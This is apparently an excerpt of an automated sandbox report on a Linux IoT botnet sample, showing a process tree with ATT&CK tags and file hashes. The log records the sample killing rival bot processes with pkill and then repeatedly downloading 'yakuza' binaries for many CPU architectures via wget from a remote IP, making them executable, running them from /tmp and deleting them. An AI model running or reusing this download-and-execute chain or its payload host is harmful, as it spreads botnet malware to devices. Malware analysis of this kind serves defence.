/bin/shsh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"3⤵PID:1087
-
/usr/bin/pkillpkill -9 SoRAxD420LOL4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1088
-
-
/bin/busyboxbusybox pkill -9 SoRAxD420LOL4⤵PID:1089
-
-
-
/bin/shsh -c "pkill -9 insomni || busybox pkill -9 insomni"3⤵PID:1090
-
/usr/bin/pkillpkill -9 insomni4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1091
-
-
/bin/busyboxbusybox pkill -9 insomni4⤵PID:1092
-
-
-
/bin/shsh -c "pkill -9 640277 || busybox pkill -9 640277"3⤵PID:1093
-
/usr/bin/pkillpkill -9 6402774⤵
- Reads CPU attributes
PID:1094
-
-
/bin/busyboxbusybox pkill -9 6402774⤵PID:1095
-
-
-
/bin/shsh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"3⤵PID:1096
-
/usr/bin/pkillpkill -9 SoraBeReppin13374⤵
- Reads CPU attributes
PID:1097
-
-
/bin/busyboxbusybox pkill -9 SoraBeReppin13374⤵PID:1098
-
-
-
/bin/shsh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"3⤵
- System Network Configuration Discovery
PID:1099 -
/usr/bin/pkillpkill -9 ipcamCache4⤵
- Reads CPU attributes
- Reads runtime system information
- System Network Configuration Discovery
PID:1100
-
-
/bin/busyboxbusybox pkill -9 ipcamCache4⤵
- System Network Configuration Discovery
PID:1101
-
-
-
/bin/shsh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"3⤵PID:1102
-
/usr/bin/pkillpkill -9 66tlGg9Q4⤵
- Reads runtime system information
PID:1103
-
-
/bin/busyboxbusybox pkill -9 66tlGg9Q4⤵PID:1104
-
-
-
/bin/shsh -c "pkill -9 T || busybox pkill -9 T"3⤵PID:1105
-
/usr/bin/pkillpkill -9 T4⤵
- Reads CPU attributes
PID:1106
-
-
/bin/busyboxbusybox pkill -9 T4⤵PID:1107
-
-
-
/bin/shsh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"3⤵PID:1108
-
/usr/bin/pkillpkill -9 jUYfouyf874⤵
- Reads CPU attributes
- Reads runtime system information
PID:1109
-
-
/bin/busyboxbusybox pkill -9 jUYfouyf874⤵PID:1110
-
-
-
/bin/shsh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"3⤵PID:1111
-
/usr/bin/pkillpkill -9 6ke34⤵
- Reads CPU attributes
PID:1112
-
-
/bin/busyboxbusybox pkill -9 6ke34⤵PID:1113
-
-
-
/bin/shsh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3"3⤵PID:1114
-
/usr/bin/pkillpkill -9 TOKYO34⤵
- Reads CPU attributes
PID:1115
-
-
/bin/busyboxbusybox pkill -9 TOKYO34⤵PID:1116
-
-
-
/bin/shsh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh"3⤵PID:1117
-
/usr/bin/pkillpkill -9 lyEeaXul2dULCVxh4⤵
- Reads runtime system information
PID:1118
-
-
/bin/busyboxbusybox pkill -9 lyEeaXul2dULCVxh4⤵PID:1119
-
-
-
/bin/shsh -c "pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z"3⤵PID:1120
-
/usr/bin/pkillpkill -9 93OfjHZ2z4⤵
- Reads CPU attributes
PID:1121
-
-
-
-
/bin/rmrm -rf yakuza.mips2⤵
- System Network Configuration Discovery
PID:728
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:732
-
-
/bin/chmodchmod +x yakuza.mipsel2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/yakuza.mipsel./yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/rmrm -rf yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:745
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.sh2⤵
- Writes file to tmp directory
PID:747
-
-
/bin/chmodchmod +x yakuza.sh2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/yakuza.sh./yakuza.sh2⤵PID:752
-
-
/bin/rmrm -rf yakuza.sh2⤵PID:755
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.x862⤵
- Writes file to tmp directory
PID:756
-
-
/bin/chmodchmod +x yakuza.x862⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/yakuza.x86./yakuza.x862⤵PID:784
-
-
/bin/rmrm -rf yakuza.x862⤵PID:788
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.arm62⤵
- Writes file to tmp directory
PID:789
-
-
/bin/chmodchmod +x yakuza.arm62⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/yakuza.arm6./yakuza.arm62⤵PID:813
-
-
/bin/rmrm -rf yakuza.arm62⤵PID:816
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.i6862⤵
- Writes file to tmp directory
PID:818
-
-
/bin/chmodchmod +x yakuza.i6862⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/yakuza.i686./yakuza.i6862⤵PID:861
-
-
/bin/rmrm -rf yakuza.i6862⤵PID:864
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.ppc2⤵
- Writes file to tmp directory
PID:866
-
-
/bin/chmodchmod +x yakuza.ppc2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/yakuza.ppc./yakuza.ppc2⤵PID:877
-
-
/bin/rmrm -rf yakuza.ppc2⤵PID:879
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.i5862⤵
- Writes file to tmp directory
PID:880
-
-
/bin/chmodchmod +x yakuza.i5862⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/yakuza.i586./yakuza.i5862⤵PID:891
-
-
/bin/rmrm -rf yakuza.i5862⤵PID:893
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.m68k2⤵
- Writes file to tmp directory
PID:896
-
-
/bin/chmodchmod +x yakuza.m68k2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/yakuza.m68k./yakuza.m68k2⤵PID:912
-
-
/bin/rmrm -rf yakuza.m68k2⤵PID:915
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.arm42⤵
- Writes file to tmp directory
PID:917
-
-
/bin/chmodchmod +x yakuza.arm42⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/yakuza.arm4./yakuza.arm42⤵PID:951
-
-
/bin/rmrm -rf yakuza.arm42⤵PID:954
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.arm52⤵
- Writes file to tmp directory
PID:956
-
-
/bin/chmodchmod +x yakuza.arm52⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/yakuza.arm5./yakuza.arm52⤵PID:969
-
-
/bin/rmrm -rf yakuza.arm52⤵PID:971
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.arm72⤵
- Writes file to tmp directory
PID:972
-
-
/bin/chmodchmod +x yakuza.arm72⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/yakuza.arm7./yakuza.arm72⤵PID:983
-
-
/bin/rmrm -rf yakuza.arm72⤵PID:985
-
-
/usr/bin/wgetwget http://82.57.165.95/yakuza.sparc2⤵
- Writes file to tmp directory
PID:986
-
-
/bin/chmodchmod +x yakuza.sparc2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/yakuza.sparc./yakuza.sparc2⤵PID:1003
-
-
/bin/rmrm -rf yakuza.sparc2⤵PID:1005
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
183KB
MD56b663dec7156331eee76ef1728d52b73
SHA150713911df22fd9f90a3175accf83f9ec7d5b486
SHA256d8eeeeaf346781bc005b5bd15fc2fe90e183cbc57ebeef44d4c266b3b099b71d
SHA512b647d10b39119dec04e757f8386f3cf808a0b6ffcb27b592145f328e213e270dd8977f323f267849a70f6be6a7bee51ec2e918ddfcf01fcaa0a1eb6596793013